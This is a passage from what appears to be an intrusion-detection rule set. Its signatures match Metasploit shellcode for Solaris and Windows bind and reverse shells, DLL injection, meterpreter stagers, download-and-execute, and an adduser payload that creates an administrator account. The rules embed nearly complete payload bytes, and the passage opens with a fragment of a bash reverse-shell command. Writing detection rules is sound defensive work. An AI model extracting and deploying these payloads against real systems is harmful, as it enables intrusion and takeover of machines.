20 27 65 63 68 6f 20 24 69 27 22 29 3b 0a 09 69 66 20 28 24 66 6f 6f 20 21 3d 20 24 69 29 20 7b 0a 09 09 24 |"; content:"| 20 3d 20 24 69 20 2d 20 31 3b 0a 09 09 62 72 65 61 6b 3b 0a 09 7d 0a 7d 0a 70 72 69 6e 74 28 22 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a 22 29 3b 0a 66 6c 75 73 68 28 29 3b 0a 0a 24 |"; content:"| 20 3d 20 22 2f 62 69 6e 2f 62 61 73 68 20 3c 26 24 |"; content:"| 20 3e 26 24 |"; content:"| 20 32 3e 26 24 |"; content:"| 22 3b 0a 6d 79 73 79 73 74 65 6d 28 24 |"; content:"| 29 3b 0a 0a |"; sid:1000108; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"solaris/sparc/shell_bind_tcp"; flow:established; content:"| 9c 2b a0 07 98 10 20 01 96 1a c0 0b 94 1a c0 0b 92 10 20 02 90 10 20 02 82 10 20 e6 91 d0 20 08 d0 23 bf f8 21 00 00 80 a0 14 20 |"; content:"| e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10 20 10 82 10 20 e8 91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10 20 e9 91 d0 20 08 d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10 20 ea 91 d0 20 08 d0 23 bf f8 94 10 20 03 92 10 20 09 94 a2 a0 01 82 10 20 3e 91 d0 20 08 12 bf ff fc d0 03 bf f8 94 1a c0 0b 21 0b d8 9a a0 14 21 6e 23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf f0 d0 23 bf f8 c0 23 bf fc 82 10 20 3b 91 d0 20 08 |"; sid:1000109; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"solaris/sparc/shell_find_port"; flow:established; content:"| 9c 2b a0 07 90 1a 80 0a d0 23 bf e8 90 02 20 01 90 0a 2f ff 92 10 20 10 d0 3b bf f8 94 23 a0 04 92 23 a0 18 82 10 20 f3 91 d0 20 08 94 10 20 03 ea 13 bf ea ba 9d 40 16 12 bf ff f5 d0 03 bf f8 92 10 20 09 94 a2 a0 01 82 10 20 3e 91 d0 20 08 12 bf ff fb 96 1a c0 0b 21 0b d8 9a a0 14 21 6e 23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf f0 d0 23 bf f8 c0 23 bf fc 82 10 20 3b 91 d0 20 08 |"; sid:1000110; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"solaris/sparc/shell_reverse_tcp"; flow:established; content:"| 9c 2b a0 07 98 10 20 01 96 1a c0 0b 94 1a c0 0b 92 10 20 02 90 10 20 02 82 10 20 e6 91 d0 20 08 d0 23 bf f8 94 10 20 03 92 10 20 09 94 a2 a0 01 82 10 20 3e 91 d0 20 08 12 bf ff fc d0 03 bf f8 21 00 00 80 a0 14 20 |"; content:"| e0 3b bf f0 92 23 a0 10 94 10 20 10 82 10 20 eb 91 d0 20 08 94 1a c0 0b 21 0b d8 9a a0 14 21 6e 23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf f0 d0 23 bf f8 c0 23 bf fc 82 10 20 3b 91 d0 20 08 |"; sid:1000111; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"solaris/x86/shell_bind_tcp"; flow:established; content:"| 68 ff d8 ff 3c 6a 65 89 e6 f7 56 04 f6 16 31 c0 50 68 ff 02 00 |"; content:"| 89 e7 6a 02 50 50 6a 02 6a 02 b0 e6 ff d6 6a 10 57 50 31 c0 b0 e8 ff d6 5b 50 50 53 b0 e9 ff d6 b0 ea ff d6 6a 09 50 6a 3e 58 ff d6 ff 4f d8 79 f6 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 50 51 53 b0 3b ff d6 |"; sid:1000112; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"solaris/x86/shell_find_port"; flow:established; content:"| 31 db f7 e3 53 89 e7 68 ff d8 ff 3c 6a 65 89 e6 f7 56 04 f6 16 57 b3 91 53 53 54 b7 54 53 50 58 40 50 6a 36 58 ff d6 66 81 7f 02 |"; content:"| 75 f0 58 50 6a 09 50 6a 3e 58 ff d6 ff 4f e0 79 f6 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 50 51 53 b0 3b ff d6 |"; sid:1000113; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"solaris/x86/shell_reverse_tcp"; flow:established; content:"| 68 ff d8 ff 3c 6a 65 89 e6 f7 56 04 f6 16 68 |"; content:"| 66 6a 02 89 e7 6a 02 31 c0 50 50 6a 02 6a 02 b0 e6 ff d6 6a 10 57 50 31 c0 b0 eb ff d6 5b 53 6a 09 53 6a 3e 58 ff d6 ff 4f e0 79 f6 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 50 51 53 b0 3b ff d6 |"; sid:1000114; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/adduser"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 6a 01 8d 85 b9 00 00 00 50 68 31 8b 6f 87 ff d5 bb f0 b5 a2 56 68 a6 95 bd 9d ff d5 3c 06 7c 0a 80 fb e0 75 05 bb 47 13 72 6f 6a 00 53 ff d5 63 6d 64 2e 65 78 65 20 2f 63 20 6e 65 74 20 75 73 65 72 20 6d 65 74 61 73 70 6c 6f 69 74 20 6d 65 74 61 73 70 6c 6f 69 74 20 2f 41 44 44 20 26 26 20 6e 65 74 20 6c 6f 63 61 6c 67 72 6f 75 70 20 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 20 6d 65 74 61 73 70 6c 6f 69 74 20 2f 41 44 44 00 |"; sid:1000115; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/bind_ipv6_tcp"; flow:established; content:"| fc e8 56 00 00 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 c0 5f 5e 5d 5b c2 08 00 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 6a 18 59 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 81 ff 5b bc 4a 6a 8b 5a 10 8b 12 75 db 5e 53 68 8e 4e 0e ec ff d6 89 c7 53 68 54 ca af 91 ff d6 81 ec 00 01 00 00 50 57 56 53 89 e5 e8 27 00 00 00 90 01 00 00 b6 19 18 e7 ec f2 55 c0 e5 49 86 49 a4 1a 70 c7 a4 ad 2e e9 d9 09 f5 ad cb ed fc 3b 57 53 32 5f 33 32 00 5b 8d 4b 20 51 ff d7 89 df 89 c3 8d 75 14 6a 07 59 51 53 ff 34 8f ff 55 04 59 89 04 8e e2 f2 2b 27 54 68 02 02 00 00 ff 55 30 31 c0 50 50 50 6a 06 6a 01 6a 17 ff 55 2c 89 c7 6a 0a 89 e0 6a 04 50 6a 17 6a 29 57 ff 55 1c 58 68 00 00 00 00 31 c9 51 51 51 51 51 68 17 00 00 |"; content:"| 89 e1 6a 1c 51 57 ff 55 24 31 db 53 57 ff 55 28 53 53 57 ff 55 20 89 c7 6a 40 |"; content:"| 5e 56 c1 e6 06 56 c1 e6 08 56 6a 00 ff 55 0c 89 c3 6a 00 68 00 10 00 00 53 57 ff 55 18 ff d3 |"; sid:1000116; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/bind_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 66 68 00 |"; content:"| 66 53 89 e1 6a 10 51 57 66 b9 80 3b ff d6 53 57 66 b9 75 49 ff d6 54 54 54 57 66 b9 32 4c ff d6 97 50 66 b9 33 ce ff d6 89 e1 50 b4 0c 50 51 57 51 66 b9 c0 38 ff e6 |"; sid:1000117; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/bind_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 31 db 53 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 53 57 68 b7 e9 38 ff ff d5 53 53 57 68 74 ec 3b e1 ff d5 57 97 68 75 6e 4d 61 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000118; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/find_tag"; flow:established; content:"| fc 33 ff 64 8b 47 30 8b 40 0c 8b 58 1c 8b 1b 8b 73 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6b 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 8b 5c 29 3c 03 dd 03 6c 29 24 57 66 47 8b f4 56 68 7f 66 04 40 57 ff d5 ad 85 c0 74 ee 99 52 b6 0c 52 56 57 ff d3 ad 3d |"; content:"| 75 dd ff e6 |"; sid:1000119; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/reverse_http"; flow:established; content:"| fc e8 ac 00 00 00 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 5c 5a 6f 6e 65 73 5c 33 00 31 30 30 34 31 32 30 30 31 32 30 31 31 30 30 31 43 3a 5c 70 72 6f 67 72 61 7e 31 5c 69 6e 74 65 72 6e 7e 31 5c 69 65 78 70 6c 6f 72 65 20 2d 6e 65 77 20 68 74 74 70 3a 2f 2f |"; content:"| 3a 38 30 30 30 2f |"; content:"| 00 e8 4e 00 00 00 60 8b 6c 24 24 8b 45 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb e3 32 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 c1 ca 0d 01 c2 eb f4 3b 54 24 28 75 e3 8b 5f 24 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 04 8b 01 e8 89 44 24 1c 61 c2 08 00 5f 5b 31 d2 64 8b 42 30 85 c0 78 0c 8b 40 0c 8b 70 1c ad 8b 40 08 eb 09 8b 40 34 83 c0 7c 8b 40 3c 89 e5 68 7e d8 e2 73 50 68 72 fe b3 16 50 68 8e 4e 0e ec 50 ff d7 96 ff d7 89 45 00 ff d7 89 45 04 52 68 70 69 33 32 |"; content:"| 68 61 64 76 61 54 ff d6 68 a9 2b 92 02 50 68 dd 9a 1c 2d 50 ff d7 89 45 08 ff d7 97 87 f3 54 56 68 01 00 00 |"; content:"| ff d7 5b 83 c6 44 50 89 e7 80 3e 43 74 1b 50 ad 50 89 e0 6a 04 57 6a 04 6a 00 50 53 ff 55 08 eb e8 8a 0d 30 00 fe 7f 88 0e 6a 54 59 29 cc 89 e7 57 f3 aa 5f c6 07 44 fe 47 2c fe 47 2d 68 75 6c 74 00 68 44 65 66 61 68 74 61 30 5c 68 57 69 6e 53 89 67 08 8d 5f 44 53 57 50 50 6a 10 50 50 50 56 50 ff 55 00 ff 55 04 |"; sid:1000120; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/reverse_ipv6_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 04 02 00 00 29 c4 48 48 54 50 68 29 80 6b 00 ff d5 50 50 50 6a 06 40 50 6a 17 68 ea 0f df e0 ff d5 89 c7 6a 1c e8 1c 00 00 00 17 00 00 |"; content:"| 00 00 00 00 fe 80 00 00 00 00 00 00 00 00 5e fe |"; content:"| 00 00 00 00 57 68 99 a5 74 61 ff d5 89 e6 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000121; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/reverse_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 68 |"; content:"| 66 53 89 e3 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 53 66 b9 c0 38 ff e6 |"; sid:1000122; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/reverse_ord_tcp"; flow:established; content:"| fc 31 db 64 8b 43 30 8b 40 0c 8b 50 1c 8b 12 8b 72 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6a 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 01 e9 8b 41 58 01 e8 8b 71 3c 01 ee 03 69 0c 53 6a 01 6a 02 ff d0 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e1 53 b7 0c 53 51 57 51 6a 10 51 57 56 ff e5 |"; sid:1000123; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/reverse_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 6a 05 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 0c ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000124; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/reverse_tcp_allports"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 12 31 c0 66 8b 46 02 86 e0 66 40 86 e0 66 89 46 02 eb df 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000125; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/dllinject/reverse_tcp_dns"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 eb 2f 68 a9 28 34 80 ff d5 8b 40 1c 6a 05 50 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 51 ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 e8 cc ff ff ff |"; content:"| 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 |"; content:"| 00 56 6a 00 68 |"; content:"| a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000126; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/download_exec"; flow:established; content:"| eb 10 5a 4a 33 c9 66 b9 3c 01 80 34 0a 99 e2 fa eb 05 e8 eb ff ff ff 70 4c 99 99 99 c3 fd 38 a9 99 99 99 12 d9 95 12 e9 85 34 12 d9 91 12 41 12 ea a5 12 ed 87 e1 9a 6a 12 e7 b9 9a 62 12 d7 8d aa 74 cf ce c8 12 a6 9a 62 12 6b f3 97 c0 6a 3f ed 91 c0 c6 1a 5e 9d dc 7b 70 c0 c6 c7 12 54 12 df bd 9a 5a 48 78 9a 58 aa 50 ff 12 91 12 df 85 9a 5a 58 78 9b 9a 58 12 99 9a 5a 12 63 12 6e 1a 5f 97 12 49 f3 9d c0 71 c9 99 99 99 1a 5f 94 cb cf 66 ce 65 c3 12 41 f3 98 c0 71 a4 99 99 99 1a 5f 8a cf df 19 a7 19 ec 63 19 af 19 c7 1a 75 b9 12 45 f3 b9 ca 66 ce 75 5e 9d 9a c5 f8 b7 fc 5e dd 9a 9d e1 fc 99 99 aa 59 c9 c9 ca cf c9 66 ce 65 12 45 c9 ca 66 ce 69 c9 66 ce 6d aa 59 35 1c 59 ec 60 c8 cb cf ca 66 4b c3 c0 32 7b 77 aa 59 5a 71 bf 66 66 66 de fc ed c9 eb f6 fa d8 fd fd eb fc ea ea 99 de fc ed ca e0 ea ed fc f4 dd f0 eb fc fa ed f6 eb e0 d8 99 ce f0 f7 dc e1 fc fa 99 dc e1 f0 ed cd f1 eb fc f8 fd 99 d5 f6 f8 fd d5 f0 fb eb f8 eb e0 d8 99 ec eb f5 f4 f6 f7 99 cc cb d5 dd f6 ee f7 f5 f6 f8 fd cd f6 |"; content:"| df f0 f5 fc d8 99 2f 66 69 6c 65 |"; sid:1000127; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/exec"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 6a 01 8d 85 b9 00 00 00 50 68 31 8b 6f 87 ff d5 bb f0 b5 a2 56 68 a6 95 bd 9d ff d5 3c 06 7c 0a 80 fb e0 75 05 bb 47 13 72 6f 6a 00 53 ff d5 |"; content:"| 74 68 69 6e 67 |"; sid:1000128; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/messagebox"; flow:established; content:"| d9 eb 9b d9 74 24 f4 31 d2 b2 77 31 c9 64 8b 71 30 8b 76 0c 8b 76 1c 8b 46 08 8b 7e 20 8b 36 38 4f 18 75 f3 59 01 d1 ff e1 60 8b 6c 24 24 8b 45 3c 8b 54 28 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 34 49 8b 34 8b 01 ee 31 ff 31 c0 fc ac 84 c0 74 07 c1 cf 0d 01 c7 eb f4 3b 7c 24 28 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 89 44 24 1c 61 c3 b2 08 29 d4 89 e5 89 c2 68 8e 4e 0e ec 52 e8 9f ff ff ff 89 45 04 bb 7e d8 e2 73 87 1c 24 52 e8 8e ff ff ff 89 45 08 68 6c 6c 20 41 68 33 32 2e 64 68 75 73 65 72 88 5c 24 0a 89 e6 56 ff 55 04 89 c2 50 bb a8 a2 4d bc 87 1c 24 52 e8 61 ff ff ff 68 6f 78 58 20 68 61 67 65 42 68 4d 65 73 73 31 db 88 5c 24 0a 89 e3 68 58 20 20 20 68 4d 53 46 21 68 72 6f 6d 20 68 6f 2c 20 66 68 48 65 6c 6c 31 c9 88 4c 24 10 89 e1 31 d2 52 53 51 52 ff d0 31 c0 50 ff 55 08 |"; sid:1000129; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/bind_ipv6_tcp"; flow:established; content:"| fc e8 56 00 00 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 c0 5f 5e 5d 5b c2 08 00 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 6a 18 59 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 81 ff 5b bc 4a 6a 8b 5a 10 8b 12 75 db 5e 53 68 8e 4e 0e ec ff d6 89 c7 53 68 54 ca af 91 ff d6 81 ec 00 01 00 00 50 57 56 53 89 e5 e8 27 00 00 00 90 01 00 00 b6 19 18 e7 ec f2 55 c0 e5 49 86 49 a4 1a 70 c7 a4 ad 2e e9 d9 09 f5 ad cb ed fc 3b 57 53 32 5f 33 32 00 5b 8d 4b 20 51 ff d7 89 df 89 c3 8d 75 14 6a 07 59 51 53 ff 34 8f ff 55 04 59 89 04 8e e2 f2 2b 27 54 68 02 02 00 00 ff 55 30 31 c0 50 50 50 6a 06 6a 01 6a 17 ff 55 2c 89 c7 6a 0a 89 e0 6a 04 50 6a 17 6a 29 57 ff 55 1c 58 68 00 00 00 00 31 c9 51 51 51 51 51 68 17 00 00 |"; content:"| 89 e1 6a 1c 51 57 ff 55 24 31 db 53 57 ff 55 28 53 53 57 ff 55 20 89 c7 6a 40 |"; content:"| 5e 56 c1 e6 06 56 c1 e6 08 56 6a 00 ff 55 0c 89 c3 6a 00 68 00 10 00 00 53 57 ff 55 18 ff d3 |"; sid:1000130; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/bind_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 66 68 00 |"; content:"| 66 53 89 e1 6a 10 51 57 66 b9 80 3b ff d6 53 57 66 b9 75 49 ff d6 54 54 54 57 66 b9 32 4c ff d6 97 50 66 b9 33 ce ff d6 89 e1 50 b4 0c 50 51 57 51 66 b9 c0 38 ff e6 |"; sid:1000131; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/bind_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 